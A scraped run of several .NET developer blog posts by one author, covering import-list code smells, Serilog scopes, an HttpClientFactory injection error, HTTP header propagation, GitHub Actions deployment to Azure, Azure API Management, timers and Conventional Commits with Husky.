Just a second! 🫷 If you are here, it means that you are a software developer.
So, you know that storage, networking, and domain management have a cost .
If you want to support this blog, please ensure that you have disabled the adblocker for this site. I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.
Thank you for your understanding. – Davide
Actually, this article is not about a tip to write cleaner code, but it is an article that aims at pointing out a code smell.
Of course, once you find this code smell in your code, you can act in order to eliminate it, and, as a consequence, you will end up with cleaner code.
The code smell is easy to identify: open your classes and have a look at the imports list (in C#, the using on top of the file).
A real example of too many imports
Here’s a real-life example (I censored the names, of course):
using MyCompany.CMS.Data;
using MyCompany.CMS.Modules;
using MyCompany.CMS.Rendering;
using MyCompany.Witch.Distribution;
using MyCompany.Witch.Distribution.Elements;
using MyCompany.Witch.Distribution.Entities;
using Microsoft.Extensions.Logging;
using Newtonsoft.Json;
using Newtonsoft.Json.Serialization;
using MyProject.Controllers.VideoPlayer.v1.DataSource;
using MyProject.Controllers.VideoPlayer.v1.Vod;
using MyProject.Core;
using MyProject.Helpers.Common;
using MyProject.Helpers.DataExplorer;
using MyProject.Helpers.Entities;
using MyProject.Helpers.Extensions;
using MyProject.Helpers.Metadata;
using MyProject.Helpers.Roofline;
using MyProject.ModelsEntities;
using MyProject.Models.ViewEntities.Tags;
using MyProject.Modules.EditorialDetail.Core;
using MyProject.Modules.VideoPlayer.Models;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Linq;
namespace MyProject.Modules.Video
Sounds familiar?
If we exclude the imports necessary to use some C# functionalities
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Linq;
We have lots of dependencies on external modules.
This means that if something changes in one of the classes that are part of those namespaces, we may end up with code that is difficult to update.
Also, guess what comes with all those imports? Constructor with too many parameters (and, in fact, in this class, I have 11 dependencies injected in the constructor) and code that is too long and difficult to understand (and, in fact, this class has 500+ lines).
A solution? Refactor your project in order to minimize scattering those dependencies.
Wrapping up
Having all those imports (in C# we use the keyword using) is a good indicator that your code does too many things. You should focus on minimizing those imports without cheating (like using global imports).
Logs are important. Properly structured logs can be the key to resolving some critical issues. With Serilog’s Scopes, you can enrich your logs with info about the context where they happened.
Table of Contents
Just a second! 🫷 If you are here, it means that you are a software developer.
So, you know that storage, networking, and domain management have a cost .
If you want to support this blog, please ensure that you have disabled the adblocker for this site. I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.
Thank you for your understanding. – Davide
Even though it’s not one of the first things we usually set up when creating a new application, logging is a real game-changer in the long run.
When an error occurred, if we have proper logging we can get more info about the context where it happened so that we can easily identify the root cause.
In this article, we will use Scopes, one of the functionalities of Serilog, to create better logs for our .NET 6 application. In particular, we’re going to create a .NET 6 API application in the form of Minimal APIs.
We will also use Seq, just to show you the final result.
To summarize, Serilog is an open source .NET library for logging. One of the best features of Serilog is that messages are in the form of a template (called Structured Logs), and you can enrich the logs with some value automatically calculated, such as the method name or exception details.
To add Serilog to your application, you simply have to run dotnet add package Serilog.AspNetCore.
Since we’re using Minimal APIs, we don’t have the StartUp file anymore; instead, we will need to add it to the Program.cs file:
As you can see, we’re injecting an ILogger<ItemsRepository>: specifying the related class automatically adds some more context to the logs that we will generate.
Installing Seq and adding it as a Sink
Seq is a logging platform that is a perfect fit for Serilog logs. If you don’t have it already installed, head to their download page and install it locally (you can even install it as a Docker container 🤩).
In the installation wizard, you can select the HTTP port that will expose its UI. Once everything is in place, you can open that page on your localhost and see a page like this:
On this page, we will see all the logs we write.
But wait! ⚠ We still have to add Seq as a sink for Serilog.
A sink is nothing but a destination for the logs. When using .NET APIs we can define our sinks both on the appsettings.json file and on the Program.cs file. We will use the second approach.
First of all, you will need to install a NuGet package to add Seq as a sink: dotnet add package Serilog.Sinks.Seq.
Then, you have to update the Serilog definition we’ve seen before by adding a .WriteTo.Seq instruction:
Notice that we’ve specified also the port that exposes our Seq instance.
Now, every time we log something, we will see our logs both on the Console and on Seq.
How to add scopes
The time has come: we can finally learn how to add Scopes using Serilog!
Setting up the example
For this example, I’ve created a simple controller, ItemsController, which exposes two endpoints: Get and Add. With these two endpoints, we are able to add and retrieve items stored in an in-memory collection.
This class has 2 main dependencies: IItemsRepository and IUsersItemsRepository. Each of these interfaces has its own concrete class, each with a private logger injected in the constructor:
public ItemsRepository(ILogger<ItemsRepository> logger)
{
_logger = logger;
}
and, similarly
public UsersItemRepository(ILogger<UsersItemRepository> logger)
{
_logger = logger;
}
How do those classes use their own _logger instances?
For example, the UsersItemRepository class exposes an AddItem method that adds a specific item to the list of items already possessed by a specific user.
publicvoid AddItem(string username, Item item)
{
if (!_usersItems.ContainsKey(username))
{
_usersItems.Add(username, new List<Item>());
_logger.LogInformation("User was missing from the list. Just added");
}
_usersItems[username].Add(item);
_logger.LogInformation("Added item for to the user's catalogue");
}
We are logging some messages, such as “User was missing from the list. Just added”.
Something similar happens in the ItemsRepository class, where we have a GetItem method that returns the required item if it exists, and null otherwise.
[HttpPost(Name = "AddItems")]public IActionResult Add(string userName, int itemId)
{
var item = _itemsRepository.GetItem(itemId);
if (item == null)
{
_logger.LogWarning("Item does not exist");
return NotFound();
}
_usersItemsRepository.AddItem(userName, item);
return Ok(item);
}
Ok then, we’re ready to run the application and see the result.
When I call that endpoint by passing “davide” as userName and “1” as itemId, we can see these logs:
We can see the 3 log messages but they are unrelated one each other. In fact, if we expand the logs to see the actual values we’ve logged, we can see that only the “Retrieving item 1” log has some information about the item ID we want to associate with the user.
Using BeginScope with Serilog
Finally, it’s time to define the Scope.
It’s as easy as adding a simple using statement; see how I added the scope to the Add method in the Controller:
[HttpPost(Name = "AddItems")]public IActionResult Add(string userName, int itemId)
{
using (_logger.BeginScope("Adding item {ItemId} for user {UserName}", itemId, userName))
{
var item = _itemsRepository.GetItem(itemId);
if (item == null)
{
_logger.LogWarning("Item does not exist");
return NotFound();
}
_usersItemsRepository.AddItem(userName, item);
return Ok(item);
}
}
Here’s the key!
using (_logger.BeginScope("Adding item {ItemId} for user {UserName}", itemId, userName))
With this single instruction, we are actually performing 2 operations:
we are adding a Scope to each message – “Adding item 1 for user davide”
we are adding ItemId and UserName to each log entry that falls in this block, in every method in the method chain.
Let’s run the application again, and we will see this result:
So, now you can use these new properties to get some info about the context of when this log happened, and you can use the ItemId and UserName fields to search for other related logs.
You can also nest scopes, of course.
Why scopes instead of Correlation ID?
You might be thinking
Why can’t I just use correlation IDs?
Well, the answer is pretty simple: correlation IDs are meant to correlate different logs in a specific request, and, often, across services. You generally use Correlation IDs that represent a specific call to your API and act as a Request ID.
For sure, that can be useful. But, sometimes, not enough.
Using scopes you can also “correlate” distinct HTTP requests that have something in common.
If I call 2 times the AddItem endpoint, I can filter both for UserName and for ItemId and see all the related logs across distinct HTTP calls.
Let’s see a real example: I have called the endpoint with different values
id=1, username=“davide”
id=1, username=“luigi”
id=2, username=“luigi”
Since the scope reference both properties, we can filter for UserName and discover that Luigi has added both Item1 and Item 2.
At the same time, we can filter by ItemId and discover that the item with id = 2 has been added only once.
Ok, then, in the end, Scopes or Correlation IDs? The answer is simple:
Then, you might want to deep dive into Serilog’s BeginScope. Here’s a neat article by Nicholas Blumhardt. Also, have a look at the comments, you’ll find interesting points to consider
A suitable constructor for type ‘X’ could not be located. What a strange error message! Luckily it’s easy to solve.
Table of Contents
Just a second! 🫷 If you are here, it means that you are a software developer.
So, you know that storage, networking, and domain management have a cost .
If you want to support this blog, please ensure that you have disabled the adblocker for this site. I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.
Thank you for your understanding. – Davide
A few days ago I was preparing the demo for a new article. The demo included a class with an IHttpClientFactory service injected into the constructor. Nothing more.
Then, running the application (well, actually, executing the code), this error popped out:
System.InvalidOperationException: A suitable constructor for type ‘X’ could not be located. Ensure the type is concrete and all parameters of a public constructor are either registered as services or passed as arguments. Also ensure no extraneous arguments are provided.
How to solve it? It’s easy. But first, let me show you what I did in the wrong version.
Setting up the wrong example
For this example, I created an elementary project.
It’s a .NET 7 API project, with only one controller, GenderController, which calls another service defined in the IGenderizeService interface.
IGenderizeService is implemented by a class, GenderizeService, which is the one that fails to load and, therefore, causes the exception to be thrown. The class calls an external endpoint, parses the result, and then returns it to the caller:
publicclassGenderizeService : IGenderizeService
{
privatereadonly IHttpClientFactory _httpClientFactory;
public GenderizeService(IHttpClientFactory httpClientFactory)
{
_httpClientFactory = httpClientFactory;
}
publicasync Task<GenderProbability> GetGenderProbabiliy(string name)
{
var httpClient = _httpClientFactory.CreateClient();
var response = await httpClient.GetAsync($"?name={name}");
var result = await response.Content.ReadFromJsonAsync<GenderProbability>();
return result;
}
}
Finally, I’ve defined the services in the Program class, and then I’ve specified which is the base URL for the HttpClient instance generated in the GenderizeService class:
// some codebuilder.Services.AddScoped<IGenderizeService, GenderizeService>();
builder.Services.AddHttpClient<IGenderizeService, GenderizeService>(
client => client.BaseAddress = new Uri("https://api.genderize.io/")
);
var app = builder.Build();
// some more code
That’s it! Can you spot the error?
2 ways to solve the error
The error was quite simple, but it took me a while to spot:
In the constructor I was injecting an IHttpClientFactory:
public GenderizeService(IHttpClientFactory httpClientFactory)
while in the host definition I was declaring an HttpClient for a specific class:
We no longer need to call _httpClientFactory.CreateClient because the injected instance of HttpClient is already customized with the settings we’ve defined at Startup.
Further readings
I’ve briefly talked about HttpClientFactory in one article of my C# tips series:
Propagating HTTP Headers can be useful, especially when dealing with Correlation IDs. It’s time to customize our HttpClients!
Table of Contents
Just a second! 🫷 If you are here, it means that you are a software developer.
So, you know that storage, networking, and domain management have a cost .
If you want to support this blog, please ensure that you have disabled the adblocker for this site. I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.
Thank you for your understanding. – Davide
Imagine this: you have a system made up of different applications that communicate via HTTP. There’s some sort of entry point, exposed to the clients, that orchestrates the calls to the other applications. How do you correlate those requests?
A good idea is to use a Correlation ID: one common approach for HTTP-based systems is passing a value to the “public” endpoint using HTTP headers; that value will be passed to all the other systems involved in that operation to say that “hey, these incoming requests in the internal systems happened because of THAT SPECIFIC request in the public endpoint”. Of course, it’s more complex than this, but you got the idea.
Now. How can we propagate an HTTP Header in .NET? I found this solution on GitHub, provided by no less than David Fowler. In this article, I’m gonna dissect his code to see how he built this solution.
Important update: there’s a NuGet package that implements these functionalities: Microsoft.AspNetCore.HeaderPropagation. Consider this article as an excuse to understand what happens behind the scenes of an HTTP call, and use it to learn how to customize and extend those functionalities. Here’s how to integrate that package.
Just interested in the C# methods?
As I said, I’m not reinventing anything new: the source code I’m using for this article is available on GitHub (see link above), but still, I’ll paste the code here, for simplicity.
First of all, we have two extension methods that add some custom functionalities to the IServiceCollection.
It’s quite easy: if you want to propagate the my-correlation-id header for all the HttpClients created in your application, you just have to add this line to your Startup method.
This class lies in the middle of the HTTP Request pipeline. It can extend the functionalities of HTTP Clients because it inherits from System.Net.Http.DelegatingHandler.
If you recall from a previous article, the SendAsync method is the real core of any HTTP call performed using .NET’s HttpClients, and here we’re enriching that method by propagating some HTTP headers.
protectedoverride Task<HttpResponseMessage> SendAsync(HttpRequestMessage request, System.Threading.CancellationToken cancellationToken)
{
if (_contextAccessor.HttpContext != null)
{
foreach (var headerName in _options.HeaderNames)
{
// Get the incoming header valuevar headerValue = _contextAccessor.HttpContext.Request.Headers[headerName];
if (StringValues.IsNullOrEmpty(headerValue))
{
continue;
}
request.Headers.TryAddWithoutValidation(headerName, (string[])headerValue);
}
}
returnbase.SendAsync(request, cancellationToken);
}
By using _contextAccessor we can access the current HTTP Context. From there, we retrieve the current HTTP headers, check if one of them must be propagated (by looking up _options.HeaderNames), and finally, we add the header to the outgoing HTTP call by using TryAddWithoutValidation.
Notice that we’ve used `TryAddWithoutValidation` instead of `Add`: in this way, we can use whichever HTTP header key we want without worrying about invalid names (such as the ones with a new line in it). Invalid header names will simply be ignored, as opposed to the Add method that will throw an exception.
Finally, we continue with the HTTP call by executing `base.SendAsync`, passing the `HttpRequestMessage` object now enriched with additional headers.
Using HttpMessageHandlerBuilder to configure how HttpClients must be built
The Microsoft.Extensions.Http.IHttpMessageHandlerBuilderFilter interface allows you to apply some custom configurations to the HttpMessageHandlerBuilder right before the HttpMessageHandler object is built.
The Configure method allows you to customize how the HttpMessageHandler will be built: we are adding a new instance of the HeaderPropagationMessageHandler class we’ve seen before to the current HttpMessageHandlerBuilder’s AdditionalHandlers collection. All the handlers registered in the list will then be used to build the HttpMessageHandler object we’ll use to send and receive requests.
Here, we’re gonna extend the IServiceCollection with those functionalities. At first, we’re adding AddHttpContextAccessor, which allows us to access the current HTTP Context (the one we’ve used in the HeaderPropagationMessageHandler class).
Then, services.ConfigureAll(configure) registers an HeaderPropagationOptions that will be used by HeaderPropagationMessageHandlerBuilderFilter. Without that line, we won’t be able to specify the names of the headers to be propagated.
Honestly, I haven’t understood it thoroughly: I thought that it allows us to use more than one class implementing IHttpMessageHandlerBuilderFilter, but apparently if we create a sibling class and add them both using Add, everything works the same. If you know what this line means, drop a comment below! 👇
Wherever you access the ServiceCollection object (may it be in the Startup or in the Program class), you can propagate HTTP headers for every HttpClient by using
Yes, AddHeaderPropagation is the method we’ve seen in the previous paragraph!
Seeing it in action
Now we have all the pieces in place.
It’s time to run it 😎
To fully understand it, I strongly suggest forking this repository I’ve created and running it locally, placing some breakpoints here and there.
As a recap: in the Program class, I’ve added these lines to create a named HttpClient specifying its BaseAddress property. Then I’ve added the HeaderPropagation as we’ve seen before.
There’s also a simple Controller that acts as an entry point and that, using an HttpClient, sends data to another endpoint (the one defined in the previous snippet).
[HttpPost]publicasync Task<IActionResult> PostAsync([FromQuery] stringvalue)
{
var item = new Item(value);
var httpClient = _httpClientFactory.CreateClient("items");
await httpClient.PostAsJsonAsync("/", item);
return NoContent();
}
What happens at start-up time
When a .NET application starts up, the Main method in the Program class acts as an entry point and registers all the dependencies and configurations required.
We will then call builder.Services.AddHeaderPropagation, which is the method present in the HeaderPropagationExtensions class.
All the configurations are then set, but no actual operations are being executed.
The application then starts normally, waiting for incoming requests.
What happens at runtime
Now, when we call the PostAsync method by passing an HTTP header such as my-correlation-id:123, things get interesting.
The first operation is
var httpClient = _httpClientFactory.CreateClient("items");
While creating the HttpClient, the engine is calling all the registered IHttpMessageHandlerBuilderFilter and calling their Configure method. So, you’ll see the execution moving to HeaderPropagationMessageHandlerBuilderFilter’s Configure.
Of course, you’re also executing the HeaderPropagationMessageHandler constructor.
The HttpClient is now ready: when we call httpClient.PostAsJsonAsync("/", item) we’re also executing all the registered DelegatingHandler instances, such as our HeaderPropagationMessageHandler. In particular, we’re executing the SendAsync method and adding the required HTTP Headers to the outgoing HTTP calls.
We will then see the same HTTP Header on the destination endpoint.
If you’re not sure about what are extension methods (and you cannot respond to this question: How does inheritance work with extension methods?), then you can have a look at this article:
Building APIs with .NET is easy. Deploying them on Azure is easy too, with GitHub Actions!
Table of Contents
Just a second! 🫷 If you are here, it means that you are a software developer.
So, you know that storage, networking, and domain management have a cost .
If you want to support this blog, please ensure that you have disabled the adblocker for this site. I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.
Thank you for your understanding. – Davide
With Continuous Delivery (CD), you can deploy your code in a fast-paced and stable way.
To deploy applications, you’ll need workflows that run and automate the process. In that way, you don’t have to perform repetitive tasks and the whole process becomes less error-prone.
In this article, we will learn how to implement CD pipelines using GitHub Actions. In particular, we will focus on the case of a .NET API application that will be deployed on Azure.
Create a .NET API project
Since the focus of this article is on the deployment part, we won’t create complex APIs. Just a simple Hello Word is enough.
To do that, we’re gonna use dotnet Minimal API – a way to create APIs without scaffolding lots of files and configurations.
Our API, the BooksAPI, has a single endpoint: /, the root, simply returns “Hello World!”.
All our code is stored in the Program file:
var builder = WebApplication.CreateBuilder(args);
var app = builder.Build();
app.UseHttpsRedirection();
app.MapGet("/", () => "Hello World!");
app.Run();
Nothing fancy: run the application locally, and navigate to the root. You will see the Hello World message.
Lastly, put your code on GitHub: initialize a repository and publish it on GitHub – it can either be a public or a private repository.
Create an App Service on Azure
Now, to deploy an application, we need to define its destination. We’re going to deploy it on Azure, so you need an Azure account before moving on.
Open the Azure Portal, navigate to the App Service section, and create a new one.
Configure it as you wish, and then proceed until you have it up and running.
Once everything is done, you should have something like this:
Now the application is ready to be used: we now need to deploy our code here.
Generate the GitHub Action YAML file for deploying .NET APIs on Azure
It’s time to create our Continuous Delivery pipeline.
Luckily, GitHub already provides lots of templates for GitHub Actions. We will need one specific for our .NET APIs.
On GitHub, navigate to your repository, head to the Actions menu, and select New workflow.
You will see several predefined actions that allow you to do stuff with your repository. We are now interested in the one called “Deploy a .NET Core app to an Azure Web App”:
Clicking on “Configure” you will see a template. Read carefully the instructions, as they will guide you to the correct configuration of the GitHub action.
In particular, you will have to update the environment variables specified in this section:
env:
AZURE_WEBAPP_NAME: your-app-name# set this to the name of your Azure Web AppAZURE_WEBAPP_PACKAGE_PATH: "."# set this to the path to your web app project, defaults to the repository rootDOTNET_VERSION: "5"# set this to the .NET Core version to use
Clearly, AZURE_WEBAPP_NAME must match the name you’ve defined on Azure, while DOTNET_VERSION must match the version you’re using to create your dotnet APIs.
For my specific project, I’ve replaced that section with
env:
AZURE_WEBAPP_NAME: BooksAPI<myName># set this to the name of your Azure Web AppAZURE_WEBAPP_PACKAGE_PATH: "."# set this to the path to your web app project, defaults to the repository rootDOTNET_VERSION: "6.0"# set this to the .NET Core version to use
🟧 DOTNET_VERSION requires also the minor version of dotnet. Setting 6 will now work: you need to specify 6.0. 🟧
Now you can save your YAML file in your repository: it will be saved under ./.github/workflows.
So, as a reference, here’s the full YAML file I’m using to deploy my APIs:
name: Build and deploy ASP.Net Core app to an Azure Web Appenv:
AZURE_WEBAPP_NAME: BooksAPI<myName>AZURE_WEBAPP_PACKAGE_PATH: "."DOTNET_VERSION: "6.0"on:
push:
branches: ["master"]
workflow_dispatch:
permissions:
contents: readjobs:
build:
runs-on: ubuntu-lateststeps:
- uses: actions/checkout@v3 - name: Set up .NET Coreuses: actions/setup-dotnet@v2with:
dotnet-version: ${{ env.DOTNET_VERSION }} - name: Set up dependency caching for faster buildsuses: actions/cache@v3with:
path: ~/.nuget/packageskey: ${{ runner.os }}-nuget-${{ hashFiles('**/packages.lock.json') }}restore-keys: |${{ runner.os }}-nuget- - name: Build with dotnetrun: dotnet build --configuration Release - name: dotnet publishrun: dotnet publish -c Release -o ${{env.DOTNET_ROOT}}/myapp - name: Upload artifact for deployment jobuses: actions/upload-artifact@v3with:
name: .net-apppath: ${{env.DOTNET_ROOT}}/myappdeploy:
permissions:
contents: noneruns-on: ubuntu-latestneeds: buildenvironment:
name: "Development"url: ${{ steps.deploy-to-webapp.outputs.webapp-url }}steps:
- name: Download artifact from build jobuses: actions/download-artifact@v3with:
name: .net-app - name: Deploy to Azure Web Appid: deploy-to-webappuses: azure/webapps-deploy@v2with:
app-name: ${{ env.AZURE_WEBAPP_NAME }}publish-profile: ${{ secrets.AZURE_WEBAPP_PUBLISH_PROFILE }}package: ${{ env.AZURE_WEBAPP_PACKAGE_PATH }}
As you can see, we have 2 distinct steps: build and deploy.
In the build phase, we check out our code, restore the NuGet dependencies, build the project, pack it and store the final result as an artifact.
In the deploy step, we retrieve the newly created artifact and publish it on Azure.
Store the Publish profile as GitHub Secret
As you can see in the instructions of the workflow file, you have to
Create a secret in your repository named AZURE_WEBAPP_PUBLISH_PROFILE, paste the publish profile contents as the value of the secret.
That Create a secret in your repository named AZURE_WEBAPP_PUBLISH_PROFILE statement was not clear to me: I thought you had to create that key within your .NET project. Turns out you can create secrets related to repositories on GitHub (so, it’s language-agnostic).
A Publish profile is a file that contains information and settings used to deploy applications to Azure. It’s nothing but an XML file that lists the possible ways to deploy your application, such as FTP, Web Deploy, Zip Deploy, and so on.
We have to get our publish profile and save it into GitHub secrets.
To retrieve the Publish profile, head to the Azure App Service page and click Get publish profile to download the file.
Now, get back on GitHub, Head to Settings > Security > Secrets > Actions.
Here you can create a new secret related to your repository.
Create a new one, name it AZURE_WEBAPP_PUBLISH_PROFILE, and paste the content of the Publish profile file you’ve just downloaded.
You will then see something like this:
Notice that the secret name must be AZURE_WEBAPP_PUBLISH_PROFILE. That constraint is set because we are accessing the Publish profile by key:
- name: Deploy to Azure Web Appid: deploy-to-webappuses: azure/webapps-deploy@v2with:
app-name: ${{ env.AZURE_WEBAPP_NAME }}publish-profile: ${{ secrets.AZURE_WEBAPP_PUBLISH_PROFILE }}package: ${{ env.AZURE_WEBAPP_PACKAGE_PATH }}
In particular, notice the publish-profile: ${{ secrets.AZURE_WEBAPP_PUBLISH_PROFILE }} part.
Clearly, the two names must match: nothing stops you from changing the name of the secret in both the YAML file and the GitHub Secret page.
Final result
It’s time to see the final result.
Update the application code (I’ve slightly modified the Hello world message), and push your changes to GitHub.
Under the Actions tab, you will see your CD pipeline run.
Once it’s completed, you can head to your application root and see the final result.
Further readings
Automating repetitive tasks allows you to perform more actions with fewer errors. Generally speaking, the more stuff you can automate, the better.
My own blog heavily relies on automation: scaffolding content, tracking ideas, and publishing online…
If you want to peek at what I do, here are my little secrets:
In this article, we’ve only built and deployed our application. We can do more: run tests and keep track of code coverage. If you want to learn how you can do it using Azure DevOps, here we go:
I have to admit that I struggled a lot in setting up the CD pipeline. I was using the one proposed by default on Visual Studio – but it didn’t work.
Using the template found on GitHub worked almost instantly – I just had to figure out what did they mean by repository secrets.
Now we have everything in place. Since the workflow is stored in a text file within my repository, if I have to create and deploy a new API project I can simply do that by copying that file and fixing the references.
In a microservices architecture, an API Gateway hides your real endpoints. We will create one using Azure API Management
Table of Contents
Just a second! 🫷 If you are here, it means that you are a software developer.
So, you know that storage, networking, and domain management have a cost .
If you want to support this blog, please ensure that you have disabled the adblocker for this site. I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.
Thank you for your understanding. – Davide
If you’re building an application that exposes several services you might not want to expose them on different hosts. Consumers will have a hard time configuring their application with all the different hostnames, and you will be forced to maintain the same URLs even if you need to move to other platforms or, for instance, you want to transform a REST endpoint into an Azure Function.
In this case, you should mask the real endpoints beneath a facade: maybe… an API Gateway? 🙂
In this article, we will learn how to configure Azure API Management (from now on: APIM) service to create an API Gateway and “hide” our real services.
Demo: publish .NET API services and locate the OpenAPI definition
For the sake of this article, we will work with 2 API services: BooksService and VideosService.
They are both .NET 6 APIs, deployed on Azure using GitHub Actions (using the steps I described in a previous article).
Both services expose their Swagger pages and a bunch of endpoints that we will gonna hide behind Azure APIM.
How to create Azure API Management (APIM) Service from Azure Portal
Now, we want to hide their real endpoints. The clients will then only know about the existence of the API Gateway, and not of the two separate API services:
It’s time to create our APIM resource.👷♂️
Head to the Azure Portal, and create a new API Management instance. I suggest reading the short overview of the functionalities provided by Azure API Management services as listed in the screenshot below.
The wizard will ask you for some info, such as the resource name, the region, and an email used to send communications (honestly speaking, I still haven’t figured out why they’re asking for your email).
Fill in all the fields, pick your preferred pricing tier (mine is Developer: it doesn’t have an SLA and is quite cheap), and then proceed with the service creation.
After several minutes (it took 50 minutes – fifty!💢 – to scaffold my instance), you will have your instance ready to be used.
We are now ready to add our APIs and expose them to our clients.
How to add APIs to Azure API Management using Swagger definition (OpenAPI)
As we’ve seen in a previous article, Swagger creates a JSON file that describes the operations available in your APIs, as well as the object structures accepted as input and returned as output.
Let me use as an example the Books API: once that API project is deployed on the cloud (it’s not mandatory to use Azure: it will work the same using other cloud vendors), you will see the Swagger UI and the related JSON definition.
We have 3 endpoints, /, /echo, and /books; those endpoints are described in the swagger.json file linked in the Swagger page; put that link aside: we will use it soon.
Finally, we can add our Books APIs to our Azure Management API Service! Head to the resource on Azure, locate the APIs menu item on the left panel, and create a new API definition using OpenAPI (which is the standard used by Swagger to create its UI).
You will see a form that allows you to create new resources from OpenAPI specifications.
Paste here the link to the swagger.json file you located before, populate the required fields and, if you want, add a prefix to identify these endpoints: I choose MyBooks.
You will then see your APIs appear in the panel shown below. It is composed of different parts:
The list of services exposed. In the screenshot below, BooksAPI, Echo API, and VideosAPI;
The list of endpoints exposed for each service: here, BooksAPI exposes endpoints at /, /echo, and /books;
A list of policies that are applied to the inbound requests before hitting the real endpoint;
The real endpoint used when calling the facade exposed by APIM;
A list of policies applied to the outbound requests after the origin has processed the requests.
For now, we will ignore both Inbound and Outbound processing, as they will be the topic of a future article.
Consuming APIs exposed on the API Gateway
We’re ready to go! Head back to the Azure API Management service dashboard and locate the URL of the API Gateway under Custom domains > Gateway URL.
This will be the root URL that our clients will use.
We can then access Books API and Videos API both on the Origin and the Gateway (we’re doing it just for demonstrating that things are working; clients will only use the APIs exposed by the API Gateway).
The Videos API maintains the exact same structure, mapping the endpoints as they are defined in Origin.
On the contrary, to access the Books APIs we have to access the /mybooks path (because we defined it a few steps ago when we imported the BooksAPI from OpenAPI definition: it’s the API Url Suffix field), as shown below:
Further readings
As usual, a bunch of interesting readings 📚
In this article, we’ve only scratched the surface of Azure API Management. There’s way lot – and you can read about it on the Microsoft Docs website:
To integrate Azure APIM, we used two simple dotNET 6 Web APIs deployed on Azure. If you wanna know how to set up GitHub Actions to build and deploy dotNET APIs, I recently published an article on that topic.
This can be just the beginning of a long journey; APIM allows you to highly customize your API Gateway by defining API access by user role, creating API documentation using custom templates and themes, and a lot of different stuff.
Just a second! 🫷 If you are here, it means that you are a software developer.
So, you know that storage, networking, and domain management have a cost .
If you want to support this blog, please ensure that you have disabled the adblocker for this site. I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.
Thank you for your understanding. – Davide
There may be times when you need to process a specific task on a timely basis, such as polling an endpoint to look for updates or refreshing a Refresh Token.
If you need infinite processing, you can pick two roads: the obvious one or the better one.
For instance, you can use an infinite loop and put a Sleep command to delay the execution of the next task:
The constructor accepts in input an interval (a double value that represents the milliseconds for the interval), whose default value is 100.
This class implements IDisposable: if you’re using it as a dependency of another component that must be Disposed, don’t forget to call Dispose on that Timer.
Note: use this only for synchronous tasks: there are other kinds of Timers that you can use for asynchronous operations, such as PeriodicTimer, which also can be stopped by canceling a CancellationToken.
Using Conventional Commits you can define a set of rules useful for writing meaningful commit messages. Using NPM. Yes, in a dotNET application!
Table of Contents
Just a second! 🫷 If you are here, it means that you are a software developer.
So, you know that storage, networking, and domain management have a cost .
If you want to support this blog, please ensure that you have disabled the adblocker for this site. I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.
Thank you for your understanding. – Davide
Setting teams conventions is a crucial step to have the project prepared to live long and prosper 🖖
A good way to set some clarity is by enforcing rules on GIT commit messages: you can enforce devs to specify the reason behind some code changes so that you can understand the history and the reason for each of those commits. Also, if you have well-crafted commit messages, Pull Requests become easier to understand, leading to better code.
Conventional Commits help you set such rules, and help you level up your commit history. In this article, we will learn how to add Conventional Commits in a .NET application.
Conventional Commits
Conventional Commits are a set of rules that help you write commit messages using a format that has multiple purposes:
they help developers understand the history of a git branch;
they help PR reviewers focus on the Pull Request by understanding the changes proposed by the developer;
using automated tools, they help versioning the application – this is useful when using Semantic Versioning;
they allow you to create automated Changelog files.
So, what does an average Conventional Commit look like?
There’s not just one way to specify such formats.
For example, you can specify that you’ve added a new feature (feat) to your APIs and describe it shortly:
feat(api): send an email to the customer
Or you can explain that you’ve fixed a bug (using fix) and add a full description of the scope of the commit.
fix: prevent racing condition
Introduce a request id and a reference to latest request. Dismiss
incoming responses other than from latest request.
There are several types of commits that you can support, such as:
feat, used when you add a new feature to the application;
fix, when you fix a bug;
docs, used to add or improve documentation to the project;
refactor, used – well – after some refactoring;
test, when adding tests or fixing broken ones
All of this prevents developers write commit messages such as “something”, “fixed bug”, “some stuff”.
So, now, it’s time to include Conventional Commits in our .NET applications.
What is our goal?
For the sake of this article, I’m going to add Conventional Commits in a .NET 7 API project. The same approach works for all the other types of .NET projects: as long as you have a Solution to work with, I’ve got you covered.
Well, actually, the following approach can be used by every project, not only those based on .NET: the reason I wrote this article is that many dotnet developers are not confident in using and configuring NPM packages, so my personal goal with this article is to give you the basics of such tools and configurations.
For the sake of this article, I’m going to explain how to add Conventional Commits with a custom format.
Say that you want to associate each commit to a Jira task. As you may know, Jira tasks have an ID composed of a project prefix and a numeric Id. So, for a project named FOO, you can have a task with Id FOO-123.
The goal of this article is, then, to force developers to create Commit messages such as
feat/FOO-123: commit short description
or, if you want to add a full description of the commit,
feat/FOO-123: commit short description
Here we can have the full description of the task.
And it can also be on multiple lines.
We are going to work at Solution level; you don’t even need an IDE: just Notepad and a Terminal are fine. Before continuing, open your solution folder and a Console pointing to the same folder.
Install NPM in your folder
Yes, even if the main application is built with .NET, we are gonna need some NPM packages to set up our Conventional Commits.
First things first: head to the Command Line and run
After specifying some configurations (Package name? Licence? Author?), you will have a brand new package.json file.
Now we can move on and add a GIT Hook.
Husky: integrate GIT Hooks to improve commit messages
To use conventional commits we have to “intercept” our GIT actions: we will need to run a specific tool right after having written a commit message; we have to validate it and, in case it does not follow the rules we’ve set, abort the operations.
We will use Husky 🔗: it’s a facility package that allows us to do stuff with our commit messages and, in general, integrate work with Git Hooks.
Head to the terminal, and install Husky by running
npm install husky --save-dev
This command will add a dependency to Husky, as you can see from the new item listed in the package.json file:
"devDependencies": {
"husky": "^8.0.3"}
Finally, to enable Git Hooks, we have to run
npm pkg set scripts.prepare="husky install"
and notice the new section in the package.json.
"scripts": {
"prepare": "husky install"},
Even with just these simple steps, we can see a first result: if you run git commit you will see a text editor open. Here you can write your commit message.
Save and close the file. The commit message has been applied, as you can see by running git log --oneline.
